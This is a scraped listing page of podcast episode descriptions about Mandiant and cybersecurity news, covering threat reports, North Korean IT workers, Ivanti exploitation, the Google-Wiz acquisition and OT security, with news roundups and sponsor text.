Podcasts about Mandiant

Karen is a genuine global leader in the cyber-legal space. She manages the relationship between Google Mandiant and its law firm and insurance partners. She has had a remarkable cyber career…think FireEye, Safeguard Cyber, Mandiant and now Google Mandiant! Karen and I caught up at the IAPP Global Conference in Washington D.C. and then again at the RSAC Conference in San Francisco. We recorded this session as some 50,000 cyber experts took over downtown San Francisco. If you want to know more about the interaction between law firms and cyber forensic firms, this podcast is for you. Karen shares her views on the current threat landscape, the role of the cyber-forensic expert, the remarkable rise of the Google Mandiant cyber team and successful engagement with law firms / legal teams. A proud Buffalonian and fierce advocate for women in cyber. This is cross-examining Karen Kukoda. Here we go…

JP Glab (Mandiant Consulting) joins host Luke to discuss responding to activity from North Korean IT workers. He walks through what initially triggered the investigation at this organization, how it progressed in parallel with an HR investigation, and ultimately what was discovered. For more on the DPRK IT workers and trends in incident response, check out Mandiant's 2025 M-Trends report. https://cloud.google.com/blog/topics/threat-intelligence/m-trends-2025

Healthcare still has a giant “Hack Me” sign taped to its back — and the latest reports from Mandiant and Verizon are here to confirm it. These cybercrime breakdowns reveal that attackers are smarter, sneakier, and spending more time poking around your network than ever before. Waiting to secure your systems until after a breach is like installing a smoke detector after the house has already burned down — by the time you smell smoke, it's too late. From dwell times that feel more like extended Airbnb stays to small businesses learning that “we're too small to target” isn't a strategy, the findings hit hard and the lessons come wrapped in some well-placed snark. More info at HelpMeWithHIPAA.com/508

Matt Lin (Senior Incident Response Consultant, Mandiant) and Daniel Spicer (Chief Security Officer, Ivanti) dive into the research and response of UNC5221's campaigns against Ivanti. They cover how this threat actor has evolved from earlier campaigns, the continued focus of edge infrastructure by APT actors, and the shared responsibility of security in mitigating threats like this. https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerabilityhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-dayhttps://www.ivanti.com/blog/an-update-on-ivantis-ongoing-commitment-to-enhanced-product-securityhttps://www.ivanti.com/resources/secure-by-design/2024https://cloud.google.com/blog/topics/threat-intelligence/2024-zero-day-trends?e=48754805

In this episode Spencer and Brad review the M-Trends 2025 Report. M-Trends 2025 is Mandiant's annual report that shares frontline learnings from its global incident-response engagements—over 450 000 hours of investigations in 2024—providing sanitized, data-driven analysis of evolving attacker tactics, dwell times, industry and regional trends, and practical recommendations to help organizations improve their defenses.M-Trends 2025: Data, Insights, and Recommendations From the Frontlines | Google Cloud BlogBlog: https://offsec.blog/Youtube: https://www.youtube.com/@cyberthreatpovTwitter: https://x.com/cyberthreatpov Spencer's Twitter: https://x.com/techspenceSpencer's LinkedIn: https://linkedin.com/in/SpencerAlessi Work with Us: https://securit360.com

Updates from RSAC 2025. Former NSA cyber chief Rob Joyce warns that AI is rapidly approaching the ability to develop high-level software exploits. An FBI official warns that China is the top threat to U.S. critical infrastructure. Mandiant and Google raise alarms over widespread infiltration of global companies by North Korean IT workers. France accuses Russia's Fancy Bear of targeting at least a dozen French government and institutional entities. SonicWall has issued an urgent alert about active exploitation of a high-severity vulnerability in its Secure Mobile Access appliances. A China-linked APT group known as “TheWizards” is abusing an IPv6 networking feature. Gremlin Stealer emerges as a serious threat. A 23-year-old Scottish man linked to the Scattered Spider hacking group has been extradited from Spain to the U.S. Senators urge FTC action on consumer neural data. New WordPress malware masquerades as an anti-malware plugin. Our guest is Andy Cao from ProjectDiscovery, the Winner of the 20th Annual RSAC™ Innovation Sandbox Contest. Our intern Kevin returns with some Kevin on the Street interviews from the RSAC floor.  Research reveals the risk of juice jacking isn't entirely imaginary.  Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn. CyberWire Guest Our guest is Andy Cao from ProjectDiscovery, who is the Winner of the 20th Annual RSAC™ Innovation Sandbox Contest 2025 event. Kevin on the Street Joining us this week from RSAC 2025, we have our partner Kevin Magee, Global Director of Cybersecurity Startups at Microsoft for Startups. Stay tuned to the CyberWire Daily podcast for “Kevin on the Street” updates on all things RSAC 2025 from Kevin all week. Today Kevin is joined by Shane Harding CEO of Devicie and Nathan Ostrowski Co-Founder Petrą Security.  You can also catch Kevin on our Microsoft for Startups⁠ Spotlight, brought to you by N2K CyberWire and Microsoft, where we shine a light on innovation, ambition, and the tech trailblazers building the future right from the startup trenches. Kevin and Dave talk with startup veteran and Cygenta co-founder FC about making the leap from hacker to entrepreneur, then speak with three Microsoft for Startups members: Matthew Chiodi⁠ of ⁠Cerby⁠, ⁠Travis Howerton⁠ of ⁠RegScale⁠, and ⁠Karl Mattson⁠ of ⁠Endor Labs⁠. Whether you are building your own startup or just love a good innovation story, listen and learn more here. Selected Reading Ex-NSA cyber boss: AI will soon be a great exploit dev (The Register)  AI makes China leading threat to US critical infrastructure, says FBI official (SC World) North Korean operatives have infiltrated hundreds of Fortune 500 companies (CyberScoop) France Blames Russia for Cyberattacks on Dozen Entities (SecurityWeek) SonicWall OS Command Injection Vulnerability Exploited in the Wild (Cyber Security News) Hackers abuse IPv6 networking feature to hijack software updates (Bleeping Computer)  New Gremlin Stealer Advertised on Hacker Forums Targets Credit Card Data and Login Credentials (GB Hackers) Alleged ‘Scattered Spider' Member Extradited to U.S. (Krebs on Security) Senators Urge FTC Action on Consumer Neural Data, Signaling Heightened Scrutiny (Cooley) New WordPress Malware as Anti-Malware Plugin Take Full Control of Website (Cyber Security News)  iOS and Android juice jacking defenses have been trivial to bypass for years (Ars Technica)Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here's our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices

Chris and Hector break down the 2025 Mandiant threat report, expose rising cyberattack trends, rant about bad CISOs, and discuss a wild case of a cybersecurity CEO caught installing malware in a hospital. Join our new Patreon! ⁠https://www.patreon.com/c/hackerandthefed⁠ Send HATF your questions at ⁠questions@hackerandthefed.com

Forecast = Scattered phishing attempts with a 90% chance of encrypted clouds. ‍ In this episode of Storm⚡️Watch, the crew dissects the evolving vulnerability tracking landscape and the challenges facing defenders as they move beyond the aging CVE system. The show also highlights the rise of sophisticated bot traffic, the expansion of GreyNoise's Global Observation Grid, and fresh tools from VulnCheck and Censys that are helping security teams stay ahead of real-time threats. In our listener poll this week, we ask: what would you do if you found a USB stick? It's a classic scenario that always sparks debate about curiosity versus caution in cybersecurity. It's officially cyber report season, and we're breaking down the latest findings from some of the industry's most influential threat intelligence teams. GreyNoise's new research spotlights the growing risk from resurgent vulnerabilities-those old flaws that go quiet for years before suddenly making a comeback, often targeting edge devices like routers and VPNs. The FBI's 2024 IC3 report is out, revealing a record $16.6 billion in reported losses last year, with phishing, extortion, and business email compromise topping the charts. Mandiant's M-Trends 2025, VulnCheck's Q1 exploitation trends, and other reports all point to a relentless pace of vulnerability weaponization, with nearly a third of new CVEs being exploited within 24 hours of disclosure. We also dig into a series of ace blog posts and research from Censys, including their push to end stale indicators and their deep dives into the sharp rise in attacks targeting edge security devices. Their recent work with GreyNoise and CursorAI on botnet hunting, as well as their new threat hunting module, are changing the game for proactive defense. VulnCheck's quarterly report is raising eyebrows with the revelation that 159 vulnerabilities were exploited in Q1 2025 alone, and 28% of those were weaponized within a single day of disclosure. This underscores how quickly attackers are operationalizing new exploits and why defenders need to move faster than ever. We round out the show with the latest from runZero and a look at GreyNoise's recent findings, including a ninefold surge in Ivanti Connect Secure scanning and a spike in Git configuration crawling-both of which highlight the ongoing risk of codebase exposure and the need for continuous vigilance. Storm Watch Homepage >> Learn more about GreyNoise >>  

Guests: Kirstie Failey @ Google Threat Intelligence Group Scott Runnels @ Mandiant Incident Response   Topics: What is the hardest thing about turning distinct incident reports into a fun to read and useful report like M-Trends? How much are the lessons and recommendations skewed by the fact that they are all “post-IR” stories? Are “IR-derived” security lessons the best way to improve security? Isn't this a bit like learning how to build safely from fires vs learning safety engineering? The report implies that F500 companies suffer from certain security issues despite their resources, does this automatically mean that smaller companies suffer from the same but more? "Dwell time" metrics sound obvious, but is there magic behind how this is done? Sometimes “dwell tie going down” is not automatically the defender's win, right? What is the expected minimum dwell time? If “it depends”, then what does it  depend on? Impactful outliers vs general trends (“by the numbers”), what teaches us more about security? Why do we seem to repeat the mistakes so much in security? Do we think it is useful to give the same advice repeatedly if the data implies that it is correct advice but people clearly do not do it? Resources: M-Trends 2025 report Mandiant Attack Lifecycle EP205 Cybersecurity Forecast 2025: Beyond the Hype and into the Reality EP147 Special: 2024 Security Forecast Report  

Verizon and Mandiant call for layered defenses against evolving threats. Cisco Talos describes ToyMaker and Cactus threat actors. Researchers discover a major Linux security flaw which allows rootkits to bypass traditional detection methods. Ransomware groups are experimenting with new business models. Deputy Assistant Director Cynthia Kaiser from the FBI Cyber Division shares the latest on Salt Typhoon. Global censorship takes a coffee break. Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn. CyberWire Guest Dave sits down with Deputy Assistant Director Cynthia Kaiser from the FBI Cyber Division who shares  a PSA on Salt Typhoon. Selected Reading 2025 Data Breach Investigations Report (Verizon) Mandiant M-Trends 2025 Report (Mandiant) Introducing ToyMaker, an initial access broker working in cahoots with double extortion gangs (Ciso Talos) Linux 'io_uring' security blindspot allows stealthy rootkit attacks (bleepingcomputer) Ransomware groups test new business models to hit more victims, increase profits (the record) Cloudflare: Government-backed internet shutdowns plummet to zero in first quarter (the record) Share your feedback. We want to ensure that you are getting the most out of the podcast. Please take a few minutes to share your thoughts with us by completing our brief listener survey as we continually work to improve the show.  Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here's our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices

Referências do EpisódioM-Trends 2025: Data, Insights, and Recommendations From the Frontlines2025 Data Breach Investigations ReportDistribution of PebbleDash Malware in March 2025Operation SyncHole: Lazarus APT goes back to the wellRussian Infrastructure Plays Crucial Role in North Korean Cybercrime OperationsLACNIC 43BsidesSPRoteiro e apresentação: Carlos Cabral e Bianca OliveiraEdição de áudio: Paulo ArruzzoNarração de encerramento: Bianca Garcia

Guest: Steve Ledzian, APAC CTO, Mandiant at Google Cloud Topics: We've seen a shift in how boards engage with cybersecurity. From your perspective, what's the most significant misconception boards still hold about cyber risk, particularly in the Asia Pacific region, and how has that impacted their decision-making? Cybersecurity is rife with jargon. If you could eliminate or redefine one overused term, which would it be and why? How does this overloaded language specifically hinder effective communication and action in the region? The Mandiant Attack Lifecycle is a well-known model. How has your experience in the East Asia region challenged or refined this model? Are there unique attack patterns or actor behaviors that necessitate adjustments? Two years post-acquisition, what's been the most surprising or unexpected benefit of the Google-Mandiant combination? M-Trends data provides valuable insights, particularly regarding dwell time. Considering the Asia Pacific region, what are the most significant factors reducing dwell time, and how do these trends differ from global averages? Given your expertise in Asia Pacific, can you share an observation about a threat actor's behavior that is often overlooked in broader cybersecurity discussions? Looking ahead, what's the single biggest cybersecurity challenge you foresee for organizations in the Asia Pacific region over the next five years, and what proactive steps should they be taking now to prepare? Resources: EP177 Cloud Incident Confessions: Top 5 Mistakes Leading to Breaches from Mandiant EP156 Living Off the Land and Attacking Critical Infrastructure: Mandiant Incident Deep Dive EP191 Why Aren't More Defenders Winning? Defender's Advantage and How to Gain it!  

In Episode 6 of The Enterprise App Podcast, Robert Kramer and Melody Brue dive into transformative trends in enterprise technology. From groundbreaking AI advancements in marketing to supply chain modernization and a closer look at major industry acquisitions, this episode is packed with insights on navigating today's rapidly evolving digital landscape.

Exploring Statistical Measures to Predict URLs as Legitimate or Intrusive Using frequency analysis, and training the model with honeypot data as well as log data from legitimate websites allows for a fairly simple and reliable triage of web server logs to identify possible malicious activity. https://isc.sans.edu/diary/Exploring%20Statistical%20Measures%20to%20Predict%20URLs%20as%20Legitimate%20or%20Intrusive%20%5BGuest%20Diary%5D/31822 Critical Unexploitable Ivanti Vulnerability Exploited CVE-2025-22457 In February, Ivanti patched CVE-2025-22457. At the time, the vulnerability was not considered to be exploitable. Mandiant now published a blog disclosing that the vulnerability was exploited as soon as mid-march https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability/ WinRAR MotW Vulnerability CVE-2025-31334 WinRAR patched a vulnerability that would not apply the Mark of the Web correctly if a compressed file included symlinks. This may make it easier to trick a victim into executing code downloaded from a website. https://nvd.nist.gov/vuln/detail/CVE-2025-31334 Microsoft Warns of Tax-Related Scam With the US personal income tax filing deadline only about a week out, Microsoft warns of commonly deployed scams that they are observing related to income tax filings https://www.microsoft.com/en-us/security/blog/2025/04/03/threat-actors-leverage-tax-season-to-deploy-tax-themed-phishing-campaigns/ Oracle Breach Update https://www.bloomberg.com/news/articles/2025-04-02/oracle-tells-clients-of-second-recent-hack-log-in-data-stolen

Three Buddy Problem - Episode 41: Costin and Juanito join the show from Black Hat Asia in Singapore. We discuss Bunnie Huang's keynote on hardware supply chains and a classification system to establish a grounded perspective on trust in hardware, Ivanti's misdiagnosis of a critical VPN applicance flaw and Mandiant reporting on a Chinese APT exploiting Ivanti devices. Plus, breaking news on the sudden firing of NSA director and head of Cyber Command Tim Haugh. We also discuss Microsoft touting AI's value in finding open-source bootloader bugs, Silent Push report on a RUssian APT impersonating the CIA, a backdoor in a popular Chinese robot dog, and Chinese dominance of the robotics market. Cast: Juan Andres Guerrero-Saade (https://twitter.com/juanandres_gs), Costin Raiu (https://twitter.com/craiu) and Ryan Naraine (https://twitter.com/ryanaraine).

Send us a textIn this episode of Relating to DevSecOps, Ken Toler and Mike McCabe dive deep into Google's blockbuster acquisition of Wiz.io for a reported $32 billion. They explore the implications for cloud security, the consolidation of the DevSecOps tooling landscape, and how this move compares to Google's previous acquisitions like Mandiant and Chronicle. The duo debates the future of multi-cloud strategies, platform fatigue, and whether Wiz will remain the darling of the security community—or get lost in the labyrinth of Google Cloud products. With sharp insights and a dash of hot takes, they paint a picture of a cloud security ecosystem at a pivotal turning point

Alphabet (het moederbedrijf van Google) deed vorige week de grootste overname uit het bestaan van het bedrijf. Het is bereid om niet minder dan 32 miljard dollar te betalen voor het jonge en relatief kleine Wiz. Cloud security is hip, zoveel is duidelijk. Maar is het ook een zinnige overname? We bespreken het in deze aflevering van Techzine Talks.Vorig jaar was Alphabet ook al in de markt voor Wiz, maar toen vonden de oprichters en eigenaren van het Israëlische cloud-security bedrijf 23 miljard niet voldoende. Dat is op zich al opvallend, want zo hoog was en is de omzet van Wiz in absolute zin niet. Het bedrijf verwacht in de loop van dit jaar op een ARR (Annual Recurring Revenue) van 1 miljard dollar te komen. Dat is weliswaar erg knap gezien de jonge leeftijd van Wiz (5 jaar oud), maar een overnamebod van 23 en nu dus 32 miljard dollar is op het eerste gezicht erg stevig.Wiz is echter best een bijzonder bedrijf, dat zich in zeer korte tijd naar de toplijstjes heeft gewerkt binnen de CNAPP (Cloud-Native Application Protection Platform)-wereld. Dit heeft het vooral gedaan met het Cloud Security Posture Management (CSPM)-onderdeel van het aanbod. Dat is volgens wie je er ook over spreekt of wat je er ook over leest echt heel erg goed. Het is in ieder geval de voornaamste reden geweest voor de snelle opkomst. Inmiddels zijn er naast Wiz Cloud ook nog Wiz Code en Wiz Defend. Deze onderdelen richten zich respectievelijk op code security en detectie en respons.Wat wil Alphabet (Google) met Wiz?De belangrijkste vraag is uiteraard wat de plannen zijn vanuit Google Cloud Platform (GCP) met Wiz. Wil het Wiz volledig integreren in GCP en als een uniek onderdeel van de Google public cloud aanbieden? Of laat het Wiz min of meer zelfstandig opereren en gaat het daarmee voor multi-cloud security. Dat laatste is altijd het doel van Wiz geweest. Het zou vervelend zijn voor klanten van Wiz als dit nu zou veranderen. De overname van Wiz zorgt er in ieder geval voor dat GCP het security-aanbod een stuk completer maakt. Met Chronicle en Mandiant was er al SIEM, threat intelligence en incident respons, nu komt daar ook cloud security bij. Alphabet en Google moesten toch juist kleiner worden?Met 32 miljard is de overname van Wiz zoals al aangegeven met afstand de grootste ooit voor Alphabet. Hiervoor was dat de 12,5 miljard die het betaalde voor Motorola. Laten we in ieder geval hopen voor de klanten van Wiz dat deze overname beter afloopt dan die van Motorola. Daar heeft Google een beetje een potje van gemaakt. Het verkocht dat onderdeel vrij snel door aan Lenovo met een stevig verlies. Het is naast een zeer grote overname ook best wel een merkwaardige overname wat ons betreft. Google ligt op andere vlakken toch best onder vuur vanwege de dominantie die het heeft. Zo gaan er geluiden dat Google de Chrome-tak moet verkopen en gaat het ook tussen de EU en Google bepaald niet soepel, met name rondom Search. Dan is het best bijzonder dat een ander onderdeel van hetzelfde bedrijf een enorme overname doet. Luister snel naar Techzine Talks om alles te weten te komen over deze mega-overname, wat deze betekent voor Google Cloud, de markt en de klanten die in de markt zijn voor cloud security.

Three Buddy Problem - Episode 38: On the show this week, we look at a hefty batch of Microsoft zero-days exploited in the wild, iOS 18.3.2 fixing an exploited WebKit bug, a mysterious Unpatched.ai being credited with Microsoft Access RCE flaws, and OpenAI lobbying for the US to ban China's DeepSeek. Plus, discussion on a Binarly technical paper with new approach to finding UEFI bootkits, Mandiant flagging custom backdoors on Juniper routers, and MEV 'sandwich attacks' front-running cryptocurrency transactions. Cast: Juan Andres Guerrero-Saade (https://twitter.com/juanandres_gs), Costin Raiu (https://twitter.com/craiu) and Ryan Naraine (https://twitter.com/ryanaraine).

Breaking down silos while securing the cloud and leveraging secure-by-design advancements.The challenges facing the industrial OT landscape that emanate from external sources are … varied, complex and constantly evolving. Smarter hacking groups, AI-driven phishing schemes and deceptive malware viruses head the list of concerns.And while these factors show no signs of fading, the reality is that there are just as many challenges facing industrial cybersecurity that are embedded within the very foundation of our operations. These legacy dynamics have created internal battles that absorb valuable resources, waste precious talent and help the bad guys stay a step ahead. With this in mind, we're going to tap into two key industry leaders to get their take on pressing, internal liabilities that are ensuring key production assets remain exposed. We'll hear from Silverfort's Rob Larsen, as he discusses the ongoing struggles created by IT/OT silos, as well secure-by-design initiatives. Mandiant's Paul Shaver will also offer his take on these silos, and how decisions related to cloud networking are impacting the security stature of key data, assets and network connections.As a go-to podcast for our listeners, we want to help you align your brand with our expertise. By sponsoring our podcast, your brand will build trust, and your message will stand out to an audience searching for tools to assist their cybersecurity efforts. Click Here to Become a Sponsor.Promoguy Talk PillsAgency in Amsterdam dives into topics like Tech, AI, digital marketing, and more drama...Listen on: Apple Podcasts SpotifyTo catch up on past episodes, you can go to Manufacturing.net, IEN.com or MBTmag.com. You can also check Security Breach out wherever you get your podcasts, including Apple, Amazon and Overcast. If you have a cybersecurity story or topic that you'd like to have us explore on Security Breach, you can reach me at jeff@ien.com. To download our latest report on industrial cybersecurity, The Industrial Sector's New Battlefield, click here.

The cybersecurity landscape gets more complicated every year, with emerging technologies such as AI and the shifting geopolitical landscape bringing extra chaos to any CISO's desk.Though automated defense systems are a welcome feather in cap for any company, it's not just the good guys who have access to the latest tools. Off-the-shelf frameworks to launch attacks are becoming more common and businesses can't rely on any single service to be a silver bullet.What are the individual forces at play here? And how can security teams keep up?In this episode, Rory speaks with Kevin Mandia, founder and former CEO at Mandiant and current board member at cybersecurity firm Expel, and Dave ‘Merk' Merkel, co-founder and CEO at Expel, to learn more about the current global cybersecurity landscape and what the future holds for security teams.Read more:State-sponsored cyber attacks: The new frontierThe new ransomware groups worrying security researchers in 2025Stopping cyber attackers from targeting the weakest links in securityStealthy malware: The threats hiding in plain sightWhy attacks against critical national infrastructure (CNI) are such a threat – and how governments are respondingWhy vendor breaches still haunt enterprise IT leadersLondon council claims it faces 20,000 cyber attacks per dayI love magic links – why aren't more services using them?How to create a secure password policyMajority of firms using generative AI experience related security incidents – even as it empowers security teams

Three Buddy Problem - Episode 32: In this episode, we rummage through the DeepSeek hype and break down what makes it different from OpenAI's models, why it's stirring up existential controversies, and what it means for the broader tech landscape. We get into the privacy concerns, the geo-political implications, how AI models handle data, the ongoing debate over IP theft and innovation, and the challenges that come with a Chinese company shipping an open-source alternative. Beyond AI, we dig into some of the latest headlines; from a Chinese ‘backdoor' in medical devices, problems with CISA's backdoor bulletin, the risks of insecure IoT, phishing attacks on influencers, and ongoing battles over censorship in the VPN space. We also touch on WhatsApp catching spyware vendor Paragon Solutions and potential shifts in U.S. government policy on commercial mercenary hacking and surveillance companies. Cast: Juan Andres Guerrero-Saade (https://twitter.com/juanandres_gs), Costin Raiu (https://twitter.com/craiu) and Ryan Naraine (https://twitter.com/ryanaraine).

Three Buddy Problem - Episode 29: Another day, another Ivanti zero-day being exploited in the wild. Plus, China's strange response to Volt Typhoon attribution, Japan blames China for hacks, a Samsung 0-click vulnerability found by Project Zero, Kim Zetter's reporting on drone sightings and a nuclear scare. Plus, hijacking abandoned .gov backdoors and Ukrainian hacktivists wiping a major Russian ISP. Cast: Juan Andres Guerrero-Saade (https://twitter.com/juanandres_gs), Costin Raiu (https://twitter.com/craiu) and Ryan Naraine (https://twitter.com/ryanaraine).

A critical zero-day is confirmed by a Japanese router maker. Romania annuls the first round of its 2024 presidential election over concerns of Russian interference. A sophisticated malware campaign targets macOS users. Mandiant uncovers a method to bypass browser isolation using QR codes. Belgian and Dutch authorities arrest eight individuals linked to online fraud schemes. A medical device company discloses a ransomware attack. A community hospital in Massachusetts confirms a ransomware attack affecting over three hundred thousand. The Termite ransomware gang claims responsibility for the attack on Blue Yonder. Synology patches multiple vulnerabilities in its Router Manager (SRM) software. The head of U.S. Cyber Command outlines the challenges of keeping decision makers up to date. Our guest is Anna Pobletts, Head of Passwordless at 1Password, discussing the state of passkeys and what she sees on the road to a truly passwordless future. Robot rats join the mischief.  Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn. CyberWire Guest Our guest is Anna Pobletts, Head of Passwordless at 1Password, discussing the state of passkeys and what she sees on the road to a truly passwordless future.  Selected Reading I-O Data Confirms Zero-Day Attacks on Routers, Full Patches Pending (SecurityWeek) Romania's top court annuls presidential election result (CNN) MacOS Passwords Alert—New Malware Targets Keychain, Chrome, Brave, Opera (Forbes) QR codes bypass browser isolation for malicious C2 communication (Bleeping Computer) Eight Suspected Phishers Arrested in Belgium, Netherlands (SecurityWeek) Medical Device Maker Artivion Scrambling to Restore Systems After Ransomware Attack (SecurityWeek) Anna Jaques Hospital ransomware breach exposed data of 300K patients (Bleeping Computer) Blue Yonder SaaS giant breached by Termite ransomware gang (Bleeping Computer) Synology Router Vulnerabilities Let Attackers Inject Arbitrary Web Script (Cyber Security News) Cyber Command Chief Discusses Challenges of Getting Intel to Users (Defense.gov) Robot Rodents: How AI Learned To Squeak And Play (Hackaday) Share your feedback. We want to ensure that you are getting the most out of the podcast. Please take a few minutes to share your thoughts with us by completing our brief listener survey as we continually work to improve the show.  Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here's our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices

Podcast: PrOTect It All (LS 24 · TOP 10% what is this?)Episode: Enhancing OT Cybersecurity: From Legacy Systems to Cloud Solutions with Paul ShaverPub date: 2024-11-18Get Podcast Transcript →powered by Listen411 - fast audio-to-text and summarizationIn this episode, Aaron is joined by Paul Shaver, an experienced OT security consultant from Mandiant, part of Google Cloud. Together, they navigate the nuanced landscape of operational technology (OT) cybersecurity.   The episode begins with Aaron recalling a critical incident at a power plant that underscores the potential pitfalls in OT environments. This sets the stage for a rich discussion on the evolution of OT technology, with Aaron and Paul reminiscing about primary domain controllers and early NT workstations.   The conversation shifts to the future of OT in the cloud, where Paul highlights the benefits of cloud solutions, including enhanced resiliency, security, and data optimization through AI. A compelling customer case study illustrates modern technology adoption with web-based HMIs and Chromeboxes.   Paul offers a detailed analysis of the current OT cybersecurity landscape, addressing the persistent legacy system challenges and the need for a cohesive IT-OT security strategy. He discusses the evolving threat landscape influenced by global geopolitical tensions and the rise of zero-day vulnerabilities.   Listeners will gain practical insights into foundational cybersecurity measures, such as network segmentation, asset inventory management, and robust access control..   Key Moments:    04:14 Connecting IT and OT optimizes processes securely. 09:54 Lost production severely impacts manufacturing revenue recovery. 14:06 Ensure network notifications; control access, separate credentials. 17:10 Engineers need secure access to adjust parameters. 21:55 Endpoint detection on older systems is critical. 28:47 Resilience is crucial in CrowdStrike incident response effectiveness. 32:11 Limited resources for global incident response efforts.= 39:22 Rebuilt domain controller caused authentication issues. 42:37 Focus on resiliency and cloud opportunities, leveraging multi-cloud. 44:59 Improve grid operations using cloud and hyper-converged technology. 48:38 Local cloud provides redundancy for remote sites. 51:15 Critical for acquisition process and problem-solving.   About the guest :  Paul Shaver has dedicated more than two decades to various roles in Operational Technology (OT), primarily within the oil and gas industry. His expertise spans OT architecture, design, and build, along with run and maintaining responsibilities as an asset owner.  Before transitioning into cybersecurity, Paul served as a Technology Director for an oil and gas company in California. Driven by a burgeoning interest in security, he joined Mandiant nearly five years ago. At Mandiant, now part of Google, Paul relishes the mission of enhancing security postures in OT and critical infrastructure, contributing to significant advancements in the field. How to connect Paul: https://www.linkedin.com/in/pbshaver/ Connect With Aaron Crow: Website: www.corvosec.com  LinkedIn: https://www.linkedin.com/in/aaronccrow   Learn more about PrOTect IT All: Email: info@protectitall.co  Website: https://protectitall.co/  X: https://twitter.com/protectitall  YouTube: https://www.youtube.com/@PrOTectITAll  FaceBook:  https://facebook.com/protectitallpodcast  To be a guest or suggest a guest/episode, please email us at info@protectitall.coThe podcast and artwork embedded on this page are from Aaron Crow, which is the property of its owner and not affiliated with or endorsed by Listen Notes, Inc.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.Apple's release of macOS 15, or Sequoia, has caused significant disruptions for several security tools and software vendors, including CrowdStrike, SentinelOne, Microsoft, and others.Attackers are exploiting GitHub notifications for phishing by sending legitimate-looking alerts with malicious URLs.Truffle Security's research exposes a significant issue in GitHub's handling of deleted and private repository data via Cross Fork Object Reference (CFOR).AhnLab's report details Supershell, a malware targeting Linux SSH servers via brute-force attacks.Since 2022, Mandiant has tracked DPRK IT workers infiltrating global organizations by posing as non-North Koreans to fund the regime's weapons programs and evade sanctions.In August 2024, Telegram CEO Pavel Durov was arrested in France, facing charges for allowing criminal activities to proliferate on the platform, including the distribution of illegal content such as child sexual abuse material.

Josh Fleischer, Principal Security Analyst with Mandiant's Managed Defense organization sits down with host Luke McNamara to discuss trends in MFA bypass and how threat actors are conducting adversary in the middle (AiTM) attacks to gain access to targeted organizations. Josh walks through a case study of MFA bypass, how token theft occurs, the increasing amount of AiTM activity with more features being added to phishing kits, and more. 

Guest: Dan Nutting, Manager - Cyber Defense,  Google Cloud Topics: What is the Defender's Advantage and why did Mandiant decide to put this out there? This is the second edition. What is different about DA-II? Why do so few defenders actually realize their Defender's Advantage?  The book talks about the importance of being "intelligence-led" in cyber defense. Can you elaborate on what this means and how organizations can practically implement this approach? Detection engineering is presented as a continuous cycle of adaptation. How can organizations ensure their detection capabilities remain effective and avoid fatigue in their SOC?   Many organizations don't seem to want to make detections at all, what do we tell them? What is this thing called “Mission Control”- it sounds really cool, can you explain it? Resources: Defender's Advantage book The Defender's Advantage: Using Artificial Intelligence in Cyber Defense supplemental paper “Threat-informed Defense Is Hard, So We Are Still Not Doing It!” blog Mandiant blog  

Google Cloud AI Security InsightsThe Big Themes:Google's ecosystem-driven security approach: Google Cloud's partner ecosystem, consisting of entities such as managed security service providers (MSSPs) and global systems integrators, helps deliver top-notch security services. While Google maintains a small in-house service capability, partners are key to scaling and extending innovations to customers. Google provides AI tools to partners, who enhance their product offerings to better serve end customers. This model ensures that the latest security advancements, such as AI integration, are accessible.Transitioning from assisted to autonomous security: Google Cloud envisions a future where AI will evolve from assistive to fully autonomous security workflows. Currently, AI plays an assistive role by providing actionable insights to security teams, helping them prioritize threats and respond more effectively. However, the goal is to transition these capabilities into semi-autonomous workflows, with the potential for fully autonomous security systems in the future.Enhancing CISOs' efficiency with AI: One of the key problems CISOs face today is the overwhelming number of security alerts, which makes it challenging to identify and act on the most critical threats. Google Cloud addresses this issue by leveraging AI to sift through thousands of alerts, helping CISOs quickly identify the most significant risks. AI can provide real-time insights, suggesting actions to mitigate potential threats and reduce the noise from less pressing alerts.The Big Quote: “AI is only as good as the data that the model is trained on and, in the world of security, we happen to have probably the world's most high quality and quantitative data set in threat intelligence."

